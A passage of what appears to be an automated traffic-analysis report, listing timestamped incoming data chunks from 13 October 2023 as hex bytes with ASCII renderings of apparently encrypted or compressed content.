a5 74 90 4b 3b 9f 3c 59 36 f7 e8 92 9b cb 58 81 59 bc ee 94 dc 64 f9 dd 37 c7 93 cd 3c 5e 6e 4f b5 3b 80 33 b7 03 d2 8f cc 7f 0f e5 72 2a 94 53 d9 d8 b4 78 22 0c Data Ascii: yi6m&ENIVW-ZnJRb(u>~!P_URuPdzu9L~1= .qX<JdR-Q/)J`Ii\|X'rx1=_A^#%9vuAIbstK;<Y6XYd7<^nO;3rSx"
2023-10-13 13:21:13 UTC	3256	IN	Data Raw: 10 76 41 54 70 31 a9 65 38 0d bb a3 69 62 f3 57 ee 76 b3 f8 58 5c 1d dc 72 aa 94 d7 f8 61 63 aa c7 44 9c 13 62 c8 bf e6 f1 18 02 be 52 b7 a3 6e 88 b9 6d d8 ef d3 f3 9d d2 f0 70 00 5e 49 ab d9 e9 b9 7a ba 8b fc 9b 99 20 56 3c bf 11 db 1e a7 d7 17 a5 d7 87 ce c1 8e 42 2c 5c 51 e5 5d 02 db eb f0 4c 0b 48 7d 32 71 7a 8c 2b 76 2d b4 08 c6 1d 33 06 49 b6 4b 6d d7 d0 c7 b4 3b cf b0 36 8b d6 ef f6 9b e6 af cc aa 68 e1 db d8 a1 3c b4 98 59 45 59 d9 8c 48 e3 df 83 74 48 a7 76 88 b0 5a aa 98 89 82 fd e4 85 5c 2a 5e 61 20 dd 04 de 55 ff a3 75 7c d5 16 a5 f1 ba 78 c4 b7 8e 39 8c 48 63 cd 32 1c 18 a1 cd 1b 3b 2e 90 78 02 d7 75 87 a4 7a 22 9b 2e ed 98 74 9c 86 a5 ce b9 84 f0 81 5d 7e 71 ad af 1c 45 d2 54 17 da 2a 46 48 cb d1 4a d4 a0 a9 21 91 e5 a5 6c a6 2f 46 b6 26 2d Data Ascii: vATp1e8ibWvX\racDbRnmp^Iz V<B,\Q]LH}2qz+v-3IKm;6h<YEYHtHvZ\^a Uu\|x9Hc2;.xuz".t]~qETFHJ!l/F&-
2023-10-13 13:21:13 UTC	3272	IN	Data Raw: b4 f8 cd ff a6 c5 fc 60 18 b5 53 02 6e b9 0a bb 26 43 2e 8d 86 07 47 74 09 75 af 35 54 b8 e4 6b 7c ec d6 c0 62 25 aa 95 e1 a2 4f e8 d9 f1 b4 80 df 26 35 d0 8d 74 a3 e3 67 a3 90 6a 3c fe 1b 8a d8 a3 49 08 40 ba ee bb 10 45 6a ea 28 bf 0a a7 b5 2a 4c 12 58 0d b3 0e f3 d4 92 2d ec e7 68 79 5a 28 dc 71 e4 44 52 17 a9 f1 27 6e 13 10 03 9a b5 64 04 2b 84 94 90 df 72 8d a6 3f 99 f7 dc 17 43 40 bd 98 6d ab 3d db 38 07 45 7d 46 04 d7 85 27 7a fe 02 4f 74 5a 6a 72 5b df 5e c0 2b 72 c3 16 d4 6d 29 4e 2e fa 5d 35 c0 d8 24 d1 70 5d 3c e8 65 02 e9 52 7e e2 e8 e8 b2 4a 86 b8 50 08 f1 c0 3b 15 22 4b 5a d3 a6 77 3b b9 f2 ab 24 76 ba 81 dc f9 0a 82 31 99 30 66 7d b0 09 58 fb 3b 9d b1 f5 9c 08 b0 c0 4d 75 c9 17 56 c4 36 f6 88 62 55 c8 63 18 17 1e 66 49 7e 49 d8 c8 7b 08 c0 Data Ascii: `Sn&C.Gtu5Tk\|b%O&5tgj<I@Ej(*LX-hyZ(qDR'nd+r?C@m=8E}F'zOtZjr[^+rm)N.]5$p]<eR~JP;"KZw;$v10f}X;MuV6bUcfI~I{
2023-10-13 13:21:13 UTC	3288	IN	Data Raw: 7e c2 61 c1 db 6e 6d aa 4d 57 6d f7 d4 f9 0d f3 77 79 24 e4 ec e1 75 77 66 2c 71 fe 51 d4 f5 d8 fc d6 81 7d c4 f0 8e 46 73 84 ea 10 c7 5b 4d 2d 68 c6 3d cc f3 a5 20 31 3d c6 5d e4 3d 57 cc 10 dc 4a 40 89 77 6e c2 6d e8 d7 18 a7 b6 c1 1e 23 40 9c 53 98 2c 26 a2 e9 27 f5 19 a9 a0 30 15 62 49 48 e0 69 cf 28 75 1e a9 a6 f1 57 b0 1c 52 81 27 40 bd e4 64 b3 d8 38 f3 f2 5a b7 38 b6 90 f7 a2 7e a1 5b 1d 63 dc 1f ef d1 4d 66 df a8 0e a3 1f 95 b0 14 4f 4a 82 dc eb fc 8d 1e 46 d8 52 54 51 2b e1 d1 54 cd c9 a0 c9 e5 53 ed 81 63 d4 39 57 e0 df b4 5c 63 4a 58 b6 d7 d8 8f a8 be 93 2e 1b 6e 4e 28 81 c3 85 70 55 ea 6d 62 b7 00 cd 67 73 24 48 65 1a 84 48 2a ea d0 e5 ee ff e0 93 b8 a5 2c 4e dc 3d 1b 59 d5 ee ea 0d 23 1e 07 78 d2 ef 58 8b 4e 5d b1 b6 07 5f 84 d7 f5 f3 16 b4 Data Ascii: ~anmMWmwy$uwf,qQ}Fs[M-h= 1=]=WJ@wnm#@S,&'0bIHi(uWR'@d8Z8~[cMfOJFRTQ+TSc9W\cJX.nN(pUmbgs$HeH*,N=Y#xXN]_
2023-10-13 13:21:13 UTC	3304	IN	Data Raw: 79 8b 41 ea 69 02 6f 75 f9 6f 40 1e f4 27 50 ba 4f 15 ce 11 76 27 e3 df 79 08 87 91 30 9c 83 2c dd 2f ee 2f 54 2e 57 ef c4 8d 67 a5 53 6d 5a d0 69 6c ec 43 de f1 33 02 10 f1 71 5a 3f 98 ae a9 e2 8b bd 80 f5 14 ff 7f 01 04 6c 1e 3b 60 dd 5b 57 40 88 db da 9a b4 e5 53 2e 17 67 f1 d9 f6 20 fb e5 43 e8 81 3c 45 1d 7f 01 62 14 05 81 02 dd 33 1d 5c 3d 95 ff 92 31 76 a6 3c 55 62 86 ad b1 3a 54 44 2e e4 3a 39 eb 0b 2b 02 f0 85 1e a2 7a 30 3f 70 b2 6b a6 8a f8 f5 52 45 9e 0b 43 1b 26 2b e7 49 82 18 b0 34 43 7d 64 f2 eb b3 0b b4 a8 d2 e1 2f 1b 6b 19 71 3e 56 19 6a f0 81 f1 17 b7 37 83 b6 e7 31 6c 6d 65 fc 52 8f 99 ea f4 54 8a 8e 31 84 5b dd c9 d0 4f c9 29 b5 67 59 18 cd 06 c4 c1 20 cb de 90 d1 c0 d3 be 0a f9 5b 7d ab 45 fc d6 36 8a 4f 92 37 b3 40 f7 12 4e e3 6c d3 Data Ascii: yAiouo@'POv'y0,//T.WgSmZilC3qZ?l;`[W@S.g C<Eb3\=1v<Ub:TD.:9+z0?pkREC&+I4C}d/kq>Vj71lmeRT1[O)gY [}E6O7@Nl
2023-10-13 13:21:13 UTC	3320	IN	Data Raw: 4e fa e1 e3 5b 63 d2 96 23 c0 34 e6 b5 39 92 18 76 27 18 be 22 e5 a9 82 dd 73 5a 26 c1 1e 2f 66 4d f5 be fc ba c6 16 53 08 15 ea 7f 28 a6 99 e4 1c ff 60 a8 f5 33 30 b4 c3 2c 50 fa 78 3e 21 69 04 ab 65 17 f9 e3 e4 7b a3 54 60 ab de 3d 9c 63 9d 51 e8 3b 75 f7 49 42 6b 47 66 e4 25 99 09 1b 94 d2 c8 0a 25 6a 33 f5 5a 97 79 f7 1c f8 46 27 46 07 89 21 50 ae 3d f0 51 4e 8d 1d fc ea 65 3a b5 c9 65 2c 06 e4 fe f7 ec 03 0f 66 49 fe fb 0c 56 01 9e 4d 9e 2b e0 40 93 6c 0e f7 cb 62 19 48 36 68 2a 6f e1 83 71 d8 53 09 c2 8d 57 fb 3d 44 d1 78 c1 98 92 7d f8 d5 ae 9a 27 49 7a 9e 86 64 95 ed f0 b0 5b ee f7 73 4b 12 14 31 56 ec 0e 30 c5 f8 6e bf f0 7d 22 d1 8c cc b3 d0 12 57 6f e5 0a e3 3e b6 3f ba 29 80 ce 8e 18 7a 47 f4 01 97 41 ff ae c1 29 44 bc e1 46 a5 e0 33 4b 0a 22 Data Ascii: N[c#49v'"sZ&/fMS(`30,Px>!ie{T`=cQ;uIBkGf%%j3ZyF'F!P=QNe:e,fIVM+@lbH6h*oqSW=Dx}'Izd[sK1V0n}"Wo>?)zGA)DF3K"
2023-10-13 13:21:13 UTC	3336	IN	Data Raw: 10 22 01 0a 08 d6 0b f4 dd 04 7b a1 2b a6 5d 7e 28 fd b8 fe a3 40 3b 37 e5 61 3f ee 8d 76 da 95 00 e4 6a a8 1e 3d 16 7b ea 13 e8 69 04 d8 8d 8c 39 24 ce 92 a4 b8 66 a2 6b eb cc ee 26 57 26 0e dc 4a 34 51 64 88 72 f4 96 b5 4b 16 67 30 e9 81 76 74 2b 7c cc eb 02 70 48 20 97 d2 92 d4 d3 97 cc 69 3d 80 b6 cf c8 af cf 89 cd 1c 80 ec ab e4 7f 64 fa e6 bb f7 e5 1b c8 0b bc 6c 45 54 08 43 71 e5 17 b2 1a ea 83 2a c9 0a 42 5b 5e 84 5d d5 27 aa 78 a5 53 4c 2d 6c 81 e2 23 f0 4b 32 f5 22 6c 60 10 d9 0d e5 c4 7a 19 63 37 ac 28 6c a3 da 19 24 00 52 4c ae f4 9e b4 67 b7 a2 97 e7 ed 43 ed e8 6a 1f 7f a2 69 c7 21 a1 78 fb 6c 01 e0 4f fa 9e ea 18 29 58 05 78 ad be 3a b9 35 da 9f 86 9a 0d 75 3b 2a 68 60 58 ff ba e6 a5 6b 08 1e 02 fe 22 fc 68 a1 62 a9 dd 17 12 a4 51 6c f6 9a Data Ascii: "{+]~(@;7a?vj={i9$fk&W&J4QdrKg0vt+\|pH i=dlETCqB[^]'xSL-l#K2"l`zc7(l$RLgCji!xlO)Xx:5u;h`Xk"hbQl
2023-10-13 13:21:13 UTC	3352	IN	Data Raw: 1a 3d 7e ec fc 38 e3 9b ff 96 ca c1 61 0b a6 54 f9 ca fa 6f 65 73 72 20 35 29 35 13 75 ba 01 7a e7 1f 5b 62 0b 48 53 d0 a5 46 68 70 f0 dc b1 e2 19 83 29 b8 fc 4a 67 39 d0 6f 6f b2 53 81 8a 13 4b af 3f 5d 16 94 88 f2 b0 b6 b2 11 c3 7c 7a 0d c9 6d 90 f8 23 ea e7 ba f2 82 70 98 d5 8a 8a 6d 4a 53 60 52 4b 59 2c 89 34 5c 5b fc ce d3 7c 51 ce 01 99 d1 67 4c 73 aa db e0 3e 6f 63 fe 50 20 6b 14 93 01 d9 06 f2 13 12 13 82 1c ea 61 51 b4 dc 2a 0c 03 c4 29 53 d8 25 ff 4d aa cc 9b 67 1e 4d a9 9a 9a aa ba 79 f4 97 8f a1 bf 93 df 9f f8 e3 b4 c2 8a e1 43 d8 d0 24 b9 5c 33 f3 2d 2a 8f ec d4 7d 10 c9 78 be f4 f1 58 0e 7e c7 ae 29 70 47 e5 06 0d c4 09 74 3a aa e4 93 c2 a3 6b 01 ba 14 4d 47 31 76 1c 82 f7 79 ea 5b 1d e8 92 1e 7e 9f 9f 1d 1b a4 92 10 b1 a5 a4 f7 37 fa 6e 9f Data Ascii: =~8aToesr 5)5uz[bHSFhp)Jg9ooSK?]\|zm#pmJS`RKY,4\[\|QgLs>ocP kaQ)S%MgMyC$\3-}xX~)pGt:kMG1vy[~7n
2023-10-13 13:21:13 UTC	3368	IN	Data Raw: 43 53 ee 9f 3d b0 0c 51 51 cd ac 72 49 87 09 cf dd 29 e0 04 9b e2 3a 86 57 c6 09 b8 f8 48 cb 07 22 48 be 10 71 c4 32 f2 6e bc e3 a8 9e 47 dc fb d9 6f 04 df 3e 16 78 ec c9 98 40 00 c4 c9 12 45 0b 69 f4 2d 87 cb 51 1d d2 18 c1 fa fb 2f 64 ef 1c 2b d4 7f 6d 9c 85 f2 4b 27 87 be 2d b0 05 02 38 51 3a 56 3b b4 05 72 f2 77 3b 0e a4 e5 87 13 0c 55 7d ce 34 41 bc 9b 8b d5 e7 f9 2e 7b a7 7e 49 08 61 52 e9 29 41 15 6b 31 95 90 e9 cc 03 b1 1e e4 c1 6f 6e 46 54 d0 ec f5 2f 2a 6a 8e cc bc 7f c4 89 54 d6 2d 8c 27 cd 20 2d cc 71 87 bc 22 40 e7 04 15 9b da b3 aa 3a fa 62 d3 70 40 f1 5e 59 1e d1 92 ed 25 5b c9 a7 09 80 40 c7 af 47 16 a1 50 c9 42 3f 36 bb eb 9d fb 7b f4 b8 85 66 14 f4 1d 69 d2 5d 2f 5d 2c 30 da bd d1 02 3b c2 9d 38 e7 16 3c e0 8e 0a 75 14 84 0a 28 a7 a8 da Data Ascii: CS=QQrI):WH"Hq2nGo>x@Ei-Q/d+mK'-8Q:V;rw;U}4A.{~IaR)Ak1onFT/*jT-' -q"@:bp@^Y%[@GPB?6{fi]/],0;8<u(
2023-10-13 13:21:13 UTC	3384	IN	Data Raw: 22 06 d3 15 fd 87 20 cb f7 30 f7 ae 8d 6b e2 2e c0 0b 46 5f 7a 89 dc 25 6c a7 d1 4e 1b 61 1c 86 53 35 f8 ee c8 5f c5 8d 95 57 6f a0 13 da fc 1c b4 26 2a e2 cc 4b 81 b2 f6 69 b5 66 2a a7 b0 a9 80 c5 d8 dd 7e 09 52 5f c4 ee dc 17 6e fa a8 d6 a2 7c f1 7c 90 80 89 fb 51 c2 77 bb e6 05 63 06 9a d4 ea ea 33 7e 25 ea 67 67 0b 99 5b 90 64 10 b0 61 0a 22 51 d9 d7 aa eb 3e 4a c3 8a f1 3e 86 3d 92 06 56 ee ff 92 6a 59 ff 29 02 77 ec 62 e2 87 3c 7d 3b dc 44 5a 09 2a 9b eb 38 61 0f f2 48 96 81 08 27 d6 a4 71 7f 5c 25 e1 a4 39 ac 31 40 3a 0d d1 33 9d 02 0f 0c c0 91 ce 51 b0 52 a4 21 8b 39 b9 cd 98 4f 2b 75 d9 ba c9 1e c5 ee 4b f2 87 e4 6d f4 ce 19 1f 94 80 48 c1 d8 21 19 86 e8 7e 80 c4 56 db 70 5e 49 a2 da f3 4f df 8a 69 95 93 a3 79 04 cb 4a 2b 90 42 6c b9 76 ac 36 b4 Data Ascii: " 0k.F_z%lNaS5_Wo&Kif~R_n\|\|Qwc3~%gg[da"Q>J>=VjY)wb<};DZ*8aH'q\%91@:3QR!9O+uKmH!~Vp^IOiyJ+Blv6
2023-10-13 13:21:13 UTC	3400	IN	Data Raw: a6 40 7e 73 a9 a2 a7 b2 d5 4b 21 1e 5b 6d 0d 57 ce 93 59 91 78 97 d8 27 7d 5a e4 bc 32 88 08 86 98 ba 86 6d 91 65 52 9f 29 4a a8 21 90 5a 04 8b 67 3d fb 39 d9 24 07 3b e6 b2 83 f2 85 f9 50 8e 0c 54 bf 84 92 9e c9 45 10 7d 30 3d b7 b0 d8 15 c4 70 52 1c 77 c8 13 e4 8f 83 23 7e 47 55 9e 31 47 c5 77 4a cf 56 df e6 de 99 13 12 d1 e6 7d 39 2c b9 d7 8a 97 1f 8a 94 e9 a2 35 9d 36 8a 57 f2 b9 0a 20 8b 38 bd 48 f6 d5 4c 87 d5 dc 9e eb d8 e5 5a 7c 86 3e 73 c9 37 45 eb 5c 3e 67 e9 46 67 93 8a de bc 05 c4 57 1d 53 49 51 7c c7 13 5b 4b 9e 4e 36 6d 4b 15 f3 f4 58 c1 6a cb ac 7c ff f5 ee 66 97 3b 44 1e df e0 d3 16 af a8 c1 92 73 88 62 c8 34 14 17 7e d0 4c 92 a9 41 25 d5 a6 7f 96 bf 2f 2e 02 ee 3a 70 96 59 29 f3 c0 b3 d6 56 ae a0 17 ca 13 44 10 f1 73 a4 e2 dc a2 e9 ad e6 Data Ascii: @~sK![mWYx'}Z2meR)J!Zg=9$;PTE}0=pRw#~GU1GwJV}9,56W 8HLZ\|>s7E\>gFgWSIQ\|[KN6mKXj\|f;Dsb4~LA%/.:pY)VDs
2023-10-13 13:21:13 UTC	3416	IN	Data Raw: bc 8b a3 0c a4 86 64 55 ec f1 80 ca 7f 97 ca 0c 39 55 3d 01 f2 37 f8 06 8a b3 f6 bb 70 ba 7c 50 b8 a9 3c 0f d9 d5 c7 a7 e0 91 96 1b 78 c0 e7 1a cb 97 fa d5 39 2b b7 e4 18 cc 8b 48 8b fe c1 be 1f 03 e9 4e a0 c1 17 7d 62 23 f0 5f 6a a9 d6 f2 32 6a d8 49 8f 06 4c 2c 1f 05 89 2e 80 b9 93 d5 38 93 5d a9 b9 e3 0b dc ed fc 67 5f 24 92 67 af e2 2c 55 13 5a 63 6e ac c6 e9 dd a4 00 c4 79 77 ee ac 30 2b f1 ae 90 05 92 87 23 ee 72 47 7f 4b 0e ed 16 05 3b 36 d5 bc e7 f6 81 ea 24 72 94 25 b7 29 59 b1 cd b1 3c 33 81 cd e3 bf 88 db 4d ce b7 72 49 65 35 8e 28 3b c4 ca c6 3a 2f 09 ba e4 19 e5 39 6b 97 98 33 c0 73 bc 6b 9f f9 a1 88 bd 8b bd c2 73 8e ed a4 a2 9c af 95 a7 9e d9 b0 d4 6a f7 6b d4 30 85 e0 4a 84 3a 98 1a 8a 0a f6 8a 0e d0 20 db 9b 41 2d b0 6c f3 f1 9d 32 4e ec Data Ascii: dU9U=7p\|P<x9+HN}b#_j2jIL,.8]g_$g,UZcnyw0+#rGK;6$r%)Y<3MrIe5(;:/9k3sksjk0J: A-l2N
2023-10-13 13:21:13 UTC	3432	IN	Data Raw: 81 b6 7e f5 ea 3f b7 4a be 73 e1 11 74 b4 fc 25 4e 00 62 d7 3a f4 7d c6 eb 2f b6 ab eb 8f 30 52 67 77 f8 28 9a bc c4 5a 63 b7 93 39 f5 02 f7 13 ef a9 6e 79 0e 7b b1 8a 0b b9 fd fb 5c 5f 4b a9 cb a4 14 73 d2 70 cd c2 79 69 d0 22 a8 a5 bf 1e 03 57 b6 24 4f 2f 1f b6 23 9a c9 fc 31 73 5e b2 60 b0 11 54 e3 48 61 c8 2d 50 d6 92 b1 84 d2 ba 9d 34 17 e8 72 b9 ae 8e 69 c8 9e 51 74 ff 9d 25 3c a8 a3 7e b8 a4 c9 f8 bf 25 0b 81 f3 ba 9e 6a 8f 72 b9 0e 65 34 37 9f 15 67 8e 1a 3f fe a2 fa 17 6e 97 4f 20 3b 7c 07 2b 3d 88 33 fc 97 4a 98 c8 91 a8 52 dc 19 22 a3 d3 6a b0 11 62 c3 d1 be 6b 90 85 e4 3e a9 92 39 54 cb c7 56 85 fb 6e 10 9a d0 de ec f5 1b 9f a0 02 91 8e 52 36 b5 df d8 5c 68 8c 5e 9f c5 10 3d 24 a4 c9 3b f1 b1 e5 1e 29 66 0a d6 e4 23 71 ab 08 c6 6e 9d 20 c0 1a Data Ascii: ~?Jst%Nb:}/0Rgw(Zc9ny{\_Kspyi"W$O/#1s^`THa-P4riQt%<~%jre47g?nO ;\|+=3JR"jbk>9TVnR6\h^=$;)f#qn
2023-10-13 13:21:13 UTC	3448	IN	Data Raw: 30 16 1f 74 2a 10 6d 9b 3c 46 51 e1 d0 2b c3 0f 3f ba 83 26 a7 b8 2d 53 55 26 c1 26 7a 3c c9 31 4b 9a ba 6c db 2e 0d 5c f8 4b b8 96 24 67 e0 f0 dd da d1 9d b1 ed 48 8e 4c 1b 6c cc 17 76 45 59 68 7c f9 ac 3b 5a 30 10 b1 92 7f 16 e6 a9 cd 1e 5e 40 94 56 80 f8 4d 5d b6 b7 03 96 82 87 2f ca 1d 87 11 20 03 a9 4d 67 25 4e 32 e0 d4 65 71 26 7b 92 7f dc fb 5a 8c 98 a6 87 ef da a4 a7 be e6 87 45 e4 22 6d c2 92 93 c8 e4 40 d3 f8 ac 68 33 3c fa 3f b4 4d a3 d3 1a 10 00 4b 98 cb d1 43 4b 42 aa 04 2b e8 4b 3d ff 39 3d 61 c1 65 78 77 44 0d 63 f6 a3 04 7d f0 80 0b 1f e5 8e e0 7f d8 d9 fa d3 41 cd 33 f9 a4 29 a7 0a 94 7e 5e 09 65 1b 47 1e 11 ec 5f d7 0e 49 52 b9 ff f3 39 6e ff 74 14 57 ec f0 d5 35 bd 0d bc 41 cb bf fe 14 bc d7 45 f9 de 34 89 37 11 f3 9c d1 24 81 16 69 d1 Data Ascii: 0t*m<FQ+?&-SU&&z<1Kl.\K$gHLlvEYh\|;Z0^@VM]/ Mg%N2eq&{ZE"m@h3<?MKCKB+K=9=aexwDc}A3)~^eG_IR9ntW5AE47$i
2023-10-13 13:21:13 UTC	3464	IN	Data Raw: 67 65 3c 48 da a2 ea ac de 02 75 20 4b 27 17 f0 b3 ae 86 fa ea 99 9c c4 01 9c 3d ab 3b 76 f0 69 83 1f 02 ff 30 6a 83 6b 15 e4 32 78 fc a8 de 23 5f 62 4a 59 c7 fa c1 e9 55 03 31 b8 1b ef 52 91 b6 52 8f ca cc 71 bd 22 37 4f 78 60 4e db e7 31 80 6c 0d 1a 1f 36 d0 28 d2 1b 61 b2 63 be 50 15 8a bf f0 30 2a c9 a6 03 37 c1 18 d5 04 7a 9e ee 1d 89 f3 cf 1a e3 62 7f a9 21 12 1e 40 fe fa a2 52 82 28 80 c8 2e 43 ab 07 c3 d0 c9 6e a2 87 00 d6 75 da 9b ef 37 5b 9a e3 98 ee cb 5f 95 a8 ed 18 de 4a 7a 60 5f a8 5f b7 2d 12 82 ed 90 cb a3 9f aa bd aa e8 69 a8 0f c1 41 8e fb de 34 19 5a 0c 6e 84 32 2c a1 89 7d 40 3c 97 55 13 da cd da 77 97 06 55 98 13 ad 98 66 3b 1d a8 d6 89 9f 9c b9 ca bf 38 53 8c ee c2 a5 bf 78 b0 50 d6 ea b3 f6 e0 12 24 1b 72 4d 6a 64 d5 3e 20 16 23 0b Data Ascii: ge<Hu K'=;vi0jk2x#_bJYU1RRq"7Ox`N1l6(acP0*7zb!@R(.Cnu7[_Jz`__-iA4Zn2,}@<UwUf;8SxP$rMjd> #
2023-10-13 13:21:13 UTC	3480	IN	Data Raw: 52 7a b4 bc 88 f2 92 91 bb ed 71 24 32 4c 3b ad 51 75 a4 4c 13 15 d8 5e 53 83 59 85 e0 1b 49 29 0f 6e 56 4e 06 67 09 62 5b 55 33 8a 05 64 ba 68 f2 55 3e 06 9d 58 7c 8c ad a2 e7 96 f3 a3 57 4f 9f be b6 c8 c3 7f 3c 3d 33 c5 59 2f 57 6c 51 47 0b f0 84 d4 93 a7 63 e3 86 68 b7 2c 47 76 93 43 52 b7 68 25 79 c0 42 d6 74 8d c3 4f 3a 99 f2 1d 4b ef 93 aa 91 e9 f8 87 cd da d9 8b bb 44 1f 7c 28 5b 35 55 72 24 6b de b4 35 f2 31 36 09 50 a9 f8 11 99 5c cb b9 81 e1 50 ad f9 76 5f 8e 7e 31 31 16 75 0e 9d f8 48 bf 11 af bb a1 95 ef 79 44 45 2e e1 3f 9b 67 df 3c cc 3e 7e 59 6b 1a c7 c4 af 65 80 28 ac 89 e2 fb ca 27 e5 1f aa 1d cf e6 32 b0 fb 00 36 75 49 9e fb 19 6c 78 6a cd 06 49 ca d9 60 d2 fc 13 3f 23 eb 03 1d d6 a6 16 ec 03 7c 9d 50 43 a1 e5 8b 8f bf 84 9c 94 a8 13 51 Data Ascii: Rzq$2L;QuL^SYI)nVNgb[U3dhU>X\|WO<=3Y/WlQGch,GvCRh%yBtO:KD\|([5Ur$k516P\Pv_~11uHyDE.?g<>~Yke('26uIlxjI`?#\|PCQ
2023-10-13 13:21:13 UTC	3496	IN	Data Raw: ad 72 af 67 2d dd 5d 70 13 98 77 bf ac 50 1b 54 85 e2 ae 3c d7 43 df 55 78 a9 d1 88 12 12 40 4f e2 59 11 4a a0 4e 5a 2e e9 ea 72 28 5f 66 60 44 42 be da 2c f6 88 52 31 96 f7 f0 03 02 27 c7 72 68 88 3b 82 43 ef f5 1b 34 2e 8a 56 d3 66 d8 b5 dd 12 80 41 af b2 a1 31 af 46 3f 2c 14 5a 0e fa 31 ef 97 76 a8 dd 4e 44 5e 89 68 de f2 b0 3a 5a b8 ab a7 f2 71 7b fc fa c5 9a f5 a2 ff 0e 6c 84 88 3e 87 0f 4c 21 12 88 27 85 72 e8 ab d6 bc 3b 91 2a 79 2a 95 4b 34 bd 95 ef c6 07 68 55 10 0b 12 ad 1b a2 1d d7 9a 35 ec 63 db d3 15 d3 57 77 fd 1c a5 47 3c 45 76 bb f4 da 9b d8 9a 59 4c ed 0c fb d1 35 61 d2 b2 12 d5 04 0e a3 12 7d a8 3e c4 f0 b0 0b 5e 85 51 ab a3 88 a8 44 05 57 8f 23 34 4b fc 03 6c ed fb d1 54 b7 03 35 1a 7f ac 40 0f fc d9 a9 b9 1c 83 8c 07 41 be e5 da f9 b0 Data Ascii: rg-]pwPT<CUx@OYJNZ.r(_f`DB,R1'rh;C4.VfA1F?,Z1vND^h:Zq{l>L!'r;yK4hU5cWwG<EvYL5a}>^QDW#4KlT5@A
2023-10-13 13:21:13 UTC	3512	IN	Data Raw: 36 27 2e 88 1f 5b cb ee 3e 44 05 bf fa a5 90 d8 93 94 59 b1 fe e7 4c d5 3c a6 f5 7f ed 64 92 ec 43 40 17 10 0d fe bf ad 3a 5c 3f 5e 74 dc 90 9b 1a c4 e3 5f 19 eb 4e e0 5e 08 c7 df e4 19 89 3d b4 43 5e ef f8 05 af 6d c5 c5 4d ef 32 15 42 54 a4 7d 03 86 7d 5e f7 e0 0b 64 38 4d 71 e4 7c 0e a4 fd 37 61 91 63 68 85 90 ae 2d bd aa 9d 26 55 fa 4a 9f 10 56 1d f1 19 e1 0c 69 56 da bf ef 2a fe 3d bf ee 93 b3 9c d7 2b bf 97 f7 90 ee 3e 7c bd 30 e5 2f d9 dd 59 d3 99 37 fb ad 43 de 09 11 9c d6 a0 57 05 34 ba 84 6f dc 2f b0 67 6f ff f2 7c d7 64 be a0 fc 7e 2b ab 88 a3 74 cb 08 88 07 f6 b9 6b 26 5b 5c f5 83 01 e4 94 bb 5d b6 5f b0 93 85 68 bd 5e b1 5f 09 63 c3 af 5e b2 74 62 3a b5 a1 6e db a5 14 83 19 59 e4 46 66 6a ef 2b 15 1c 20 98 67 6e ad 7d 58 97 18 fa 74 bc 80 cd Data Ascii: 6'.[>DYL<dC@:\?^t_N^=C^mM2BT}}^d8Mq\|7ach-&UJViV*=+>\|0/Y7CW4o/go\|d~+tk&[\]_h^_c^tb:nYFfj+ gn}Xt
2023-10-13 13:21:13 UTC	3528	IN	Data Raw: 34 01 b1 82 bd bc a3 60 1b b3 4d 98 ea ea ca 36 63 87 92 50 eb b3 49 28 e1 f9 38 9c e3 93 8c f7 6a 0e 10 57 de f0 cf 51 e9 01 cb 3e 32 93 69 14 72 76 ee 69 e6 92 2e d1 db 5e 0e d9 fa ff 29 db 26 d0 dd 8f 95 f9 48 aa a9 b2 db e2 23 72 b1 39 68 44 fd cd 0d a0 a4 b9 12 d8 16 e8 58 32 bf 06 32 bd 96 a4 08 4b 4e 89 55 e6 14 94 3b 52 01 f2 96 47 d3 0e 3c fc 12 49 81 53 e9 f0 58 57 ff f3 60 2c 77 ac 9e 14 35 05 09 da 14 d1 43 87 db cf 90 5e f5 7d 00 db 77 f1 36 57 c1 58 a0 53 03 89 ea 31 13 1b 42 f7 25 84 20 25 fb 35 86 20 12 f9 d6 df 2b 3d 5b ae 29 60 e7 f4 76 9c 5d 8c da 83 77 f1 1d 5a de 51 55 91 6c 87 1c 87 b9 3a 94 3c 59 63 85 c1 9e ad 18 1a 2a 7f 53 0a 41 4c dc a2 ab 50 c5 ef 63 ed 3a 6c 75 e7 5c a2 42 25 ae 69 9a d8 9a c6 92 9c 6a e8 a9 2d 41 a3 87 1e 11 Data Ascii: 4`M6cPI(8jWQ>2irvi.^)&H#r9hDX22KNU;RG<ISXW`,w5C^}w6WXS1B% %5 +=[)`v]wZQUl:<Yc*SALPc:lu\B%ij-A
2023-10-13 13:21:13 UTC	3544	IN	Data Raw: d4 d5 7a f8 0c 45 a9 fe 92 00 83 67 3d 2d 12 b6 aa 2c bf 1c 60 db 91 56 d4 a6 23 80 3d 31 ad 77 4b b5 f3 99 d8 fc 63 50 03 b3 25 f6 a3 03 6f ed 03 7c ba b0 be 83 83 d5 ec dc f5 88 61 d8 81 0f 86 0f 7f 01 18 e6 fa 56 53 a1 31 7f 3c 1f bd a9 d3 27 73 aa c0 6a bc 7c a5 36 27 e4 34 35 9e 6a 93 4d 5f e8 01 0f df 0b 64 f9 ba 0e 57 70 8d 68 b9 d1 61 d9 be 84 ed 74 0a cc f5 6f 53 0e b2 94 e1 29 42 28 66 29 81 40 9f e3 9b da 9a 4e 61 17 3f ae bf b3 a6 07 aa ac 8a cf 81 2f cb 92 1e 54 d2 c4 80 d0 55 12 d7 3a a4 26 c9 7e 5b a0 1e f0 07 22 fd 9f a9 d9 de f6 75 e7 36 a1 62 30 f2 7e 56 4a d1 74 d1 95 96 97 ba 9b 96 63 36 34 91 9e 89 eb 33 40 1a 02 58 3a 1c 2a 83 e2 cc 4e 6a cb 2a 67 8f 81 53 5a 9e 31 e4 46 8e 2f c8 66 47 82 cb 2b 97 6e 99 2a bc 05 3e d7 7e 70 04 cf bb Data Ascii: zEg=-,`V#=1wKcP%o\|aVS1<'sj\|6'45jM_dWphatoS)B(f)@Na?/TU:&~["u6b0~VJtc643@X:NjgSZ1F/fG+n*>~p
